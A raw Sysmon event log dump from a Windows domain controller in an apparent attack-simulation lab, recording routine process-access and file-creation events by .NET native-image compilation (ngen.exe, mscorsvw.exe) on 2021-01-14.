13:22:47.311{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45A7-6000-7102-000000009A01}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006575Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:47.295{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45A7-6000-7102-000000009A01}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006574Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:47.295{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45A7-6000-7102-000000009A01}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006573Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:47.092{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45A7-6000-7002-000000009A01}4400C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006572Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:47.076{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45A7-6000-7002-000000009A01}4400C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006571Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:47.076{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45A7-6000-7002-000000009A01}4400C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.748{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AD-6000-7502-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.748{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45AD-6000-7502-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.748{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AD-6000-7502-000000009A01}4172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.670{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AD-6000-7402-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006586Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.655{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45AD-6000-7402-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006585Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.655{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AD-6000-7402-000000009A01}5076C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006584Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:53.608{08A6967A-45AD-6000-7302-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\126c-0\System.Device.dll2021-01-14 13:22:53.608 10341000x80000000000000006583Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.514{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AD-6000-7302-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006582Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.514{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45AD-6000-7302-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006581Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.514{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AD-6000-7302-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006580Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.467{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AD-6000-7202-000000009A01}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006579Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.467{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45AD-6000-7202-000000009A01}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006578Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:53.467{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AD-6000-7202-000000009A01}3088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006577Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:53.155{08A6967A-45A7-6000-7102-000000009A01}4756C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1294-0\System.Design.dll2021-01-14 13:22:53.155 10341000x80000000000000006604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.952{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AE-6000-7902-000000009A01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.936{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45AE-6000-7902-000000009A01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.936{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AE-6000-7902-000000009A01}4032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.905{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AE-6000-7802-000000009A01}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.889{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45AE-6000-7802-000000009A01}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.889{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45AE-6000-7802-000000009A01}3028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:54.827{08A6967A-45AE-6000-7702-000000009A01}3700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e74-0\System.DirectoryServices.Protocols.dll2021-01-14 13:22:54.827 10341000x80000000000000006597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:54.498{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45AE-6000-7702-000000009A01}3700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Wi